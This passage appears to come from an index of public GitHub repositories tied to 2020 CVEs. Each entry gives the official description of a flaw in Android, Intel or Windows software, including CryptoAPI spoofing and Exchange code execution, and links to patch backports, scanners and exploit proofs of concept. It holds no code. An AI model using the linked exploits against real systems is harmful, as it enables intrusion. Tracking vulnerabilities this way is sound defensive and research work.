In exif_data_load_data_thumbnail of exif-data.c, there is a possible denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-145075076.

- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181)

### CVE-2020-0183 (2020-06-11)

In handleMessage of BluetoothManagerService, there is an incomplete reset. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-110181479.

- [nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183)
- [hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183)

### CVE-2020-0188 (2020-06-11)

In onCreatePermissionRequest of SettingsSliceProvider.java, there is a possible permissions bypass due to a PendingIntent error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-147355897.

- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188)
- [ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188](https://github.com/ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219)

### CVE-2020-0198 (2020-06-11)

In exif_data_load_data_content of exif-data.c, there is a possible UBSAN abort due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-146428941.

- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198)

### CVE-2020-0201 (2020-06-11)

In showSecurityFields of WifiConfigController.java, there is a possible credential leak due to a confused deputy. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-143601727.

- [uthrasri/Packages_app_settings_CVE-2020-0201](https://github.com/uthrasri/Packages_app_settings_CVE-2020-0201)
- [Trinadh465/packages_apps_Settings_CVE-2020-0201](https://github.com/Trinadh465/packages_apps_Settings_CVE-2020-0201)

### CVE-2020-0203 (2020-06-11)

In freeIsolatedUidLocked of ProcessList.java, there is a possible UID reuse due to improper cleanup. This could lead to local escalation of privilege between constrained processes with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-146313311.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203)

### CVE-2020-0209 (2020-06-11)

In multiple functions of AccountManager.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-145206842.

- [pazhanivel07/frameworks_base_CVE-2020-0209](https://github.com/pazhanivel07/frameworks_base_CVE-2020-0209)

### CVE-2020-0215 (2020-06-11)

In onCreate of ConfirmConnectActivity.java, there is a possible leak of Bluetooth information due to a permissions bypass. This could lead to local escalation of privilege that exposes a pairing Bluetooth MAC address with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11. Android ID: A-140417248.

- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215)

### CVE-2020-0218 (2020-06-11)

In loadSoundModel and related functions of SoundTriggerHwService.cpp, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-136005905.

- [pazhanivel07/frameworks_av-CVE-2020-0218](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0218)

### CVE-2020-0219 (2020-06-11)

In onCreate of SliceDeepLinkSpringBoard.java, there is a possible insecure Intent. This could lead to local elevation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-122836081.

- [pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219](https://github.com/pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219)
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one)

### CVE-2020-0225 (2020-07-17)

In a2dp_vendor_ldac_decoder_decode_packet of a2dp_vendor_ldac_decoder.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-142546668.

- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0225](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0225)

### CVE-2020-0226 (2020-07-17)

In createWithSurfaceParent of Client.cpp, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-150226994.

- [Trinadh465/frameworks_native_CVE-2020-0226](https://github.com/Trinadh465/frameworks_native_CVE-2020-0226)
- [ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226](https://github.com/ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226)

### CVE-2020-0227 (2020-07-17)

In onCommand of CompanionDeviceManagerService.java, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing background data usage or launching from the background, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-129476618.

- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0227](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0227)

### CVE-2020-0240 (2020-08-11)

In NewFixedDoubleArray of factory.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-150706594.

- [ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240](https://github.com/ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240)

### CVE-2020-0241 (2020-08-11)

In NuPlayerStreamListener of NuPlayerStreamListener.cpp, there is possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-151456667.

- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241)

### CVE-2020-0242 (2020-08-11)

In reset of NuPlayerDriver.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-151643722.

- [pazhanivel07/frameworks_av-10-r33_CVE-2020-0242](https://github.com/pazhanivel07/frameworks_av-10-r33_CVE-2020-0242)
- [pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243)

### CVE-2020-0245 (2020-09-17)

In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11. Android ID: A-152496149.

- [Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245](https://github.com/Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245)

### CVE-2020-0377 (2020-10-14)

In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11. Android ID: A-158833854.

- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377)

### CVE-2020-0380 (2020-09-17)

In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11. Android ID: A-146398979.

- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380)

### CVE-2020-0381 (2020-09-17)

In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11. Android ID: A-150159669.

- [Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381](https://github.com/Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381)

### CVE-2020-0391 (2020-09-17)

In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11. Android ID: A-158570769.

- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0391)

### CVE-2020-0392 (2020-09-17)

In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11. Android ID: A-150226608.

- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392)

### CVE-2020-0394 (2020-09-17)

In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-155648639.

- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394)
- [pazhanivel07/Settings_10-r33_CVE-2020-0394](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394)
- [pazhanivel07/Settings_10-r33_CVE-2020-0394_02](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02)

### CVE-2020-0401 (2020-09-17)

In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-150857253.

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401)
- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0401](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0401)

### CVE-2020-0409 (2020-11-10)

In create of FileMap.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-8.0, Android-8.1, Android-9; Android ID: A-156997193.

- [nanopathi/system_core_AOSP10_r33_CVE-2020-0409](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0409)

### CVE-2020-0413 (2020-10-14)

In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158778659.

- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413)

### CVE-2020-0416 (2020-10-14)

In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-155288585.

- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416)
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416)

### CVE-2020-0418 (2020-11-10)

In getPermissionInfosForGroup of Utils.java, there is a logic error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10; Android ID: A-153879813.

- [Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418](https://github.com/Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418)
- [fernandodruszcz/CVE-2020-0418](https://github.com/fernandodruszcz/CVE-2020-0418)

### CVE-2020-0421 (2020-10-14)

In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-161894517.

- [nanopathi/system_core_AOSP10_r33_CVE-2020-0421](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0421)

### CVE-2020-0423 (2020-10-14)

In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-161151868; References: N/A.

- [sparrow-labz/CVE-2020-0423](https://github.com/sparrow-labz/CVE-2020-0423)

### CVE-2020-0439 (2020-11-10)

In generatePackageInfo of PackageManagerService.java, there is a possible permissions bypass due to an incorrect permission check. This could lead to local escalation of privilege that allows instant apps access to permissions not allowed for instant apps, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-140256621.

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439)

### CVE-2020-0443 (2020-11-10)

In LocaleList of LocaleList.java, there is a possible forced reboot due to an uncaught exception. This could lead to local denial of service requiring factory reset to restore with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-152410253.

- [Supersonic/CVE-2020-0443](https://github.com/Supersonic/CVE-2020-0443)

### CVE-2020-0451 (2020-11-10)

In sbrDecoder_AssignQmfChannels2SbrChannels of sbrdecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-9, Android-8.0, Android-8.1; Android ID: A-158762825.

- [nanopathi/external_aac_AOSP10_r33_CVE-2020-0451](https://github.com/nanopathi/external_aac_AOSP10_r33_CVE-2020-0451)

### CVE-2020-0452 (2020-11-10)

In exif_entry_get_value of exif-entry.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if a third party app used this library to process remote image data with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-159625731.

- [ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452](https://github.com/ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452)

### CVE-2020-0453 (2020-11-10)

In updateNotification of BeamTransferManager.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.0, Android-8.1; Android ID: A-159060474.

- [pazhanivel07/Nfc_CVE-2020-0453](https://github.com/pazhanivel07/Nfc_CVE-2020-0453)
- [nanopathi/Packages_apps_Nfc_CVE-2020-0453](https://github.com/nanopathi/Packages_apps_Nfc_CVE-2020-0453)
- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453)

### CVE-2020-0458 (2020-12-14)

In SPDIFEncoder::writeBurstBufferBytes and related methods of SPDIFEncoder.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-8.0, Android-8.1; Android ID: A-160265164.

- [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458)

### CVE-2020-0463 (2020-12-14)

In sdp_server_handle_client_req of sdp_server.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure from the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.0, Android-8.1, Android-9; Android ID: A-169342531.

- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0463](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0463)

### CVE-2020-0471 (2021-01-11)

In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible way to inject packets into an encrypted Bluetooth connection due to improper input validation. This could lead to remote escalation of privilege between two Bluetooth devices by a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-169327567.

- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0471](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0471)

### CVE-2020-0551 (2020-03-12)

Load value injection in some Intel(R) Processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. The list of affected products is provided in intel-sa-00334: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00334.html

- [bitdefender/lvi-lfb-attack-poc](https://github.com/bitdefender/lvi-lfb-attack-poc)

### CVE-2020-0557 (2020-04-15)

Insecure inherited permissions in Intel(R) PROSet/Wireless WiFi products before version 21.70 on Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.

- [hessandrew/CVE-2020-0557_INTEL-SA-00338](https://github.com/hessandrew/CVE-2020-0557_INTEL-SA-00338)

### CVE-2020-0568 (2020-04-15)

Race condition in the Intel(R) Driver and Support Assistant before version 20.1.5 may allow an authenticated user to potentially enable denial of service via local access.

- [hessandrew/CVE-2020-0568_INTEL-SA-00344](https://github.com/hessandrew/CVE-2020-0568_INTEL-SA-00344)

### CVE-2020-0601 (2020-01-14)

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.

- [nissan-sudo/CVE-2020-0601](https://github.com/nissan-sudo/CVE-2020-0601)
- [0xxon/cve-2020-0601](https://github.com/0xxon/cve-2020-0601)
- [SherlockSec/CVE-2020-0601](https://github.com/SherlockSec/CVE-2020-0601)
- [JPurrier/CVE-2020-0601](https://github.com/JPurrier/CVE-2020-0601)
- [0xxon/cve-2020-0601-plugin](https://github.com/0xxon/cve-2020-0601-plugin)
- [ly4k/CurveBall](https://github.com/ly4k/CurveBall)
- [kudelskisecurity/chainoffools](https://github.com/kudelskisecurity/chainoffools)
- [RrUZi/Awesome-CVE-2020-0601](https://github.com/RrUZi/Awesome-CVE-2020-0601)
- [BlueTeamSteve/CVE-2020-0601](https://github.com/BlueTeamSteve/CVE-2020-0601)
- [saleemrashid/badecparams](https://github.com/saleemrashid/badecparams)
- [0xxon/cve-2020-0601-utils](https://github.com/0xxon/cve-2020-0601-utils)
- [Doug-Moody/Windows10_Cumulative_Updates_PowerShell](https://github.com/Doug-Moody/Windows10_Cumulative_Updates_PowerShell)
- [MarkusZehnle/CVE-2020-0601](https://github.com/MarkusZehnle/CVE-2020-0601)
- [YoannDqr/CVE-2020-0601](https://github.com/YoannDqr/CVE-2020-0601)
- [thimelp/cve-2020-0601-Perl](https://github.com/thimelp/cve-2020-0601-Perl)
- [dlee35/curveball_lua](https://github.com/dlee35/curveball_lua)
- [IIICTECH/-CVE-2020-0601-ECC---EXPLOIT](https://github.com/IIICTECH/-CVE-2020-0601-ECC---EXPLOIT)
- [Ash112121/CVE-2020-0601](https://github.com/Ash112121/CVE-2020-0601)
- [gentilkiwi/curveball](https://github.com/gentilkiwi/curveball)
- [Hans-MartinHannibalLauridsen/CurveBall](https://github.com/Hans-MartinHannibalLauridsen/CurveBall)
- [apodlosky/PoC_CurveBall](https://github.com/apodlosky/PoC_CurveBall)
- [ioncodes/Curveball](https://github.com/ioncodes/Curveball)
- [amlweems/gringotts](https://github.com/amlweems/gringotts)
- [yanghaoi/CVE-2020-0601](https://github.com/yanghaoi/CVE-2020-0601)
- [talbeerysec/CurveBallDetection](https://github.com/talbeerysec/CurveBallDetection)
- [david4599/CurveballCertTool](https://github.com/david4599/CurveballCertTool)
- [eastmountyxz/CVE-2020-0601-EXP](https://github.com/eastmountyxz/CVE-2020-0601-EXP)
- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR)
- [gremwell/cve-2020-0601_poc](https://github.com/gremwell/cve-2020-0601_poc)
- [bsides-rijeka/meetup-2-curveball](https://github.com/bsides-rijeka/meetup-2-curveball)
- [exploitblizzard/CVE-2020-0601-spoofkey](https://github.com/exploitblizzard/CVE-2020-0601-spoofkey)
- [ShayNehmad/twoplustwo](https://github.com/ShayNehmad/twoplustwo)
- [okanulkr/CurveBall-CVE-2020-0601-PoC](https://github.com/okanulkr/CurveBall-CVE-2020-0601-PoC)
- [cimashiro/-Awesome-CVE-2020-0601-](https://github.com/cimashiro/-Awesome-CVE-2020-0601-)
- [tyj956413282/curveball-plus](https://github.com/tyj956413282/curveball-plus)
- [JoelBts/CVE-2020-0601_PoC](https://github.com/JoelBts/CVE-2020-0601_PoC)

### CVE-2020-0609 (2020-01-14)

A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0610.

- [ruppde/rdg_scanner_cve-2020-0609](https://github.com/ruppde/rdg_scanner_cve-2020-0609)
- [ly4k/BlueGate](https://github.com/ly4k/BlueGate)
- [MalwareTech/RDGScanner](https://github.com/MalwareTech/RDGScanner)
- [Archi73ct/CVE-2020-0609](https://github.com/Archi73ct/CVE-2020-0609)
- [ioncodes/BlueGate](https://github.com/ioncodes/BlueGate)

### CVE-2020-0618 (2020-02-11)

A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.

- [euphrat1ca/CVE-2020-0618](https://github.com/euphrat1ca/CVE-2020-0618)
- [wortell/cve-2020-0618](https://github.com/wortell/cve-2020-0618)
- [itstarsec/CVE-2020-0618](https://github.com/itstarsec/CVE-2020-0618)

### CVE-2020-0624 (2020-01-14)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0642.

- [james0x40/CVE-2020-0624](https://github.com/james0x40/CVE-2020-0624)

### CVE-2020-0668 (2020-02-11)

An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0669, CVE-2020-0670, CVE-2020-0671, CVE-2020-0672.

- [RedCursorSecurityConsulting/CVE-2020-0668](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
- [Nan3r/CVE-2020-0668](https://github.com/Nan3r/CVE-2020-0668)
- [modulexcite/SysTracingPoc](https://github.com/modulexcite/SysTracingPoc)
- [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668)
- [bypazs/CVE-2020-0668.exe](https://github.com/bypazs/CVE-2020-0668.exe)
- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)

### CVE-2020-0674 (2020-02-11)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.

- [maxpl0it/CVE-2020-0674-Exploit](https://github.com/maxpl0it/CVE-2020-0674-Exploit)
- [Ken-Abruzzi/CVE-2020-0674](https://github.com/Ken-Abruzzi/CVE-2020-0674)
- [Neko-chanQwQ/CVE-2020-0674-PoC](https://github.com/Neko-chanQwQ/CVE-2020-0674-PoC)
- [Micky-Thongam/Internet-Explorer-UAF](https://github.com/Micky-Thongam/Internet-Explorer-UAF)

### CVE-2020-0683 (2020-02-11)

An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0686.

- [padovah4ck/CVE-2020-0683](https://github.com/padovah4ck/CVE-2020-0683)

### CVE-2020-0688 (2020-02-11)

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

- [random-robbie/cve-2020-0688](https://github.com/random-robbie/cve-2020-0688)
- [Jumbo-WJB/CVE-2020-0688](https://github.com/Jumbo-WJB/CVE-2020-0688)
- [Ridter/cve-2020-0688](https://github.com/Ridter/cve-2020-0688)
- [Yt1g3r/CVE-2020-0688_EXP](https://github.com/Yt1g3r/CVE-2020-0688_EXP)
- [righter83/CVE-2020-0688](https://github.com/righter83/CVE-2020-0688)
- [truongtn/cve-2020-0688](https://github.com/truongtn/cve-2020-0688)
- [onSec-fr/CVE-2020-0688-Scanner](https://github.com/onSec-fr/CVE-2020-0688-Scanner)
- [youncyb/CVE-2020-0688](https://github.com/youncyb/CVE-2020-0688)
- [zcgonvh/CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688)
- [justin-p/PSForgot2kEyXCHANGE](https://github.com/justin-p/PSForgot2kEyXCHANGE)
- [cert-lv/CVE-2020-0688](https://github.com/cert-lv/CVE-2020-0688)
- [ravinacademy/CVE-2020-0688](https://github.com/ravinacademy/CVE-2020-0688)
- [mahyarx/Exploit_CVE-2020-0688](https://github.com/mahyarx/Exploit_CVE-2020-0688)
- [ktpdpro/CVE-2020-0688](https://github.com/ktpdpro/CVE-2020-0688)
- [w4fz5uck5/cve-2020-0688-webshell-upload-technique](https://github.com/w4fz5uck5/cve-2020-0688-webshell-upload-technique)
- [murataydemir/CVE-2020-0688](https://github.com/murataydemir/CVE-2020-0688)
- [zyn3rgy/ecp_slap](https://github.com/zyn3rgy/ecp_slap)
- [SLSteff/CVE-2020-0688-Scanner](https://github.com/SLSteff/CVE-2020-0688-Scanner)
- [MrTiz/CVE-2020-0688](https://github.com/MrTiz/CVE-2020-0688)
- [ann0906/proxylogon](https://github.com/ann0906/proxylogon)
- [7heKnight/CVE-2020-0688](https://github.com/7heKnight/CVE-2020-0688)
- [1337-llama/CVE-2020-0688-Python3](https://github.com/1337-llama/CVE-2020-0688-Python3)
- [chudamax/CVE-2020-0688-Exchange2010](https://github.com/chudamax/CVE-2020-0688-Exchange2010)
- [W01fh4cker/CVE-2020-0688-GUI](https://github.com/W01fh4cker/CVE-2020-0688-GUI)

### CVE-2020-0728 (2020-02-11)

An information disclosure vulnerability exists when Windows Modules Installer Service improperly discloses file information, aka 'Windows Modules Installer Service Information Disclosure Vulnerability'.

- [irsl/CVE-2020-0728](https://github.com/irsl/CVE-2020-0728)

### CVE-2020-0753 (2020-02-11)

An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0754.

- [afang5472/CVE-2020-0753-and-CVE-2020-0754](https://github.com/afang5472/CVE-2020-0753-and-CVE-2020-0754)
- [VikasVarshney/CVE-2020-0753-and-CVE-2020-0754](https://github.com/VikasVarshney/CVE-2020-0753-and-CVE-2020-0754)

### CVE-2020-0787 (2020-03-12)

An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.

